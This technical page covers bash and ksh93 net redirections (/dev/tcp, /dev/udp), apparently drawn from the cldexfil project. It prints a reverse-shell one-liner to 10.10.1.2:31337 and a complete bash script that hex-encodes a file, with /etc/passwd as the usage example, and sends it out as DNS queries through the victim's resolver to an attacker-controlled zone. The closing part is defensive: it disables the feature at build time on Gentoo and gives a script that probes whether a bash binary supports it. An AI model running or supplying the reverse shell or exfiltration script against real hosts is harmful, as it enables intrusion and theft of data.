cldexfil shells net redirection
Several Unix shells, such as bash and ksh93, implement net redirections. This feature allows you (or an attacker who can execute shell commands) to redirect a command's input and output to a connectionless UDP socket or an established TCP connection through the pseudo-paths /dev/udp/host/port and /dev/tcp/host/port. Attackers frequently use it to establish a reverse shell without dropping any extra tooling on the victim, by injecting a command such as:
$ bash -i >& /dev/tcp/10.10.1.2/31337 0>&1
The same feature can be abused to craft valid DNS queries and hand them to the victim's DNS forwarder, which will faithfully forward them to the wider internet and in particular to the attacker's authoritative DNS server(s) for the queried domain. This opens up novel exploitation and exfiltration opportunities, such as client-less data exfiltration over the DNS channel: no client program has to be installed on the victim, the shell alone builds and sends the packets (see the cldexfil project page for more information).
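The following is an added example, not code from the cldexfil project, showing what "the shell alone builds and sends the packets" means in practice: it assembles a DNS wire-format query from shell builtins, verifies it as a hex dump, and hands it to a forwarder through a /dev/udp net redirection. The resolver address 127.0.0.1:53, the zone name and the 60-character chunking are assumptions for the illustration.

```bash
#!/usr/bin/env bash
# Added example, not code from the cldexfil project: build a DNS wire-format
# query from shell builtins and hand it to the local forwarder through a
# /dev/udp net redirection. Only dns_exfil() needs bash (for /dev/udp); the
# packet builder itself is plain POSIX sh.

# Helpers emit printf escape TEXT ("\022\064"), not bytes, so the finished
# query is written by a single printf call. That matters: every write() on a
# /dev/udp redirection becomes its own datagram, so several printf calls
# would split one query into several bogus packets.
be16() { printf '\\%03o\\%03o' $(( ($1 >> 8) & 0xff )) $(( $1 & 0xff )); }

# Encode "a.b.c" as DNS labels: <len><label>...<0>. Labels are limited to
# 63 octets, and only hostname characters are accepted so the label can be
# embedded safely in a printf format string (no '%' or '\' can sneak in).
dns_name() {
  local label old_ifs
  old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs
  for label in "$@"; do
    [ -n "$label" ] || continue                        # tolerate a trailing dot
    case $label in *[!A-Za-z0-9-]*) echo "bad label: $label" >&2; return 1;; esac
    [ "${#label}" -le 63 ] || { echo "label too long: $label" >&2; return 1; }
    printf '\\%03o%s' "${#label}" "$label"
  done
  printf '\\000'
}

# Header (ID, flags=0x0100 i.e. RD set, QDCOUNT=1) + question (name, QTYPE,
# QCLASS=IN). $1 name, $2 qtype (default 16 = TXT), $3 transaction ID
# (default derived from the shell's PID; pass one explicitly for a
# reproducible packet).
dns_query() {
  local name=$1 qtype=${2:-16} id=${3:-$(( $$ & 0xffff ))} fmt
  fmt=$(be16 "$id"; be16 0x0100; be16 1; be16 0; be16 0; be16 0)
  fmt="$fmt$(dns_name "$name")" || return 1
  fmt="$fmt$(be16 "$qtype")$(be16 1)"
  printf "$fmt"
}

# Same query as a hex string, handy for eyeballing or for diffing against a
# tcpdump capture of what the forwarder really received.
dns_query_hex() { dns_query "$@" | od -An -v -tx1 | tr -d ' \n'; }

# Exfiltrate a file over the DNS channel: hex-encode it, pack it into
# <seq>.<chunk>.<zone> names and send one query per chunk to the forwarder,
# which forwards the unknown name to the authoritative server for <zone>,
# where the names only need to be logged. Resolver and zone are assumptions;
# replace them with the victim's forwarder and a domain you control.
# If this bash was built with --disable-net-redirections the redirection
# fails with "No such file or directory" and the function returns 1.
dns_exfil() {
  local file=$1 zone=$2 resolver=${3:-127.0.0.1} hex chunk seq=0
  hex=$(od -An -v -tx1 "$file" | tr -d ' \n')
  while [ -n "$hex" ]; do
    chunk=$(printf '%.60s' "$hex"); hex=${hex#"$chunk"}   # 60 hex chars = 30 bytes
    dns_query "$seq.$chunk.$zone" 16 > "/dev/udp/$resolver/53" || return 1
    seq=$(( seq + 1 ))
  done
}
```

Typical use is `dns_exfil /etc/passwd exfil.example.net 10.0.0.53`; inspect a packet first with `dns_query_hex 0.deadbeef.exfil.example.net 16 1`. The forwarder never needs to trust the victim beyond accepting a syntactically valid query, which is exactly why stock recursive resolvers make such good unwitting relays.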
The table below includes a non-exhaustive list of shells that implement and support the net redirections feature:
| Shell | Version |
|---|---|
| AT&T ksh | ksh93 |
| GNU Bash | 2.04 and higher |
The bash packages shipped by most major Linux and Unix distributions, such as Ubuntu, Arch Linux, Gentoo and CentOS, are built with net redirections enabled; notable exceptions include Debian and OpenBSD, whose bash builds disable the feature. Because the decision is made at build time, check the binary you actually run rather than inferring from the distribution name.
If you build bash yourself, you can drop the feature entirely at compile time with configure's --disable-net-redirections option, which is what the distributions above that lack the feature do. Bear in mind that this removes a convenience, not the capability: ksh93 and any other networking-capable program on the host remain available to an attacker who can already run commands. On Gentoo, pass the flag through EXTRA_ECONF for a one-off build:
# EXTRA_ECONF="--disable-net-redirections" emerge --ask --verbose bash
or make it persistent with a per-package environment file, so the flag survives future rebuilds:
# echo 'EXTRA_ECONF="--disable-net-redirections"' > /etc/portage/env/bash.conf
# echo 'app-shells/bash bash.conf' >> /etc/portage/package.env
# emerge app-shells/bash
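Whether you disabled the feature yourself or want to know what a given host's bash was built with, the probe below tells you. It is an added example, not part of the cldexfil project: it asks a bash binary to open a UDP net redirection to 127.0.0.1 port 9 (an arbitrary assumption; a UDP "connect" to loopback sends nothing on the wire, so the check is silent and works offline) and reports whether the open succeeded.

```bash
#!/usr/bin/env bash
# Added example (not part of the cldexfil project): check whether a bash
# binary was built with net redirections. With --disable-net-redirections,
# /dev/tcp/... and /dev/udp/... are treated as ordinary, non-existent paths
# and the open fails with "No such file or directory". A failure for another
# reason (e.g. no loopback interface) would also read as "disabled".

# Exit status: 0 = enabled, 1 = disabled, 2 = binary not runnable.
net_redirections_enabled() {
  local bash_bin=${1:-bash}
  command -v "$bash_bin" >/dev/null 2>&1 || return 2
  # 127.0.0.1:9 is an assumption; any address works, nothing is transmitted.
  "$bash_bin" -c 'exec 3<>/dev/udp/127.0.0.1/9' >/dev/null 2>&1
}

# Same check as a word, convenient for inventory scripts run across hosts.
net_redirections_status() {
  local rc=0
  net_redirections_enabled "$@" || rc=$?
  case $rc in
    0) echo enabled ;;
    1) echo disabled ;;
    *) echo unavailable ;;
  esac
}
```

Run `net_redirections_status /bin/bash` on each host; a result of `enabled` on a system that was supposed to ship a hardened build is the kind of drift a rebuild from an updated package.env quietly fixes.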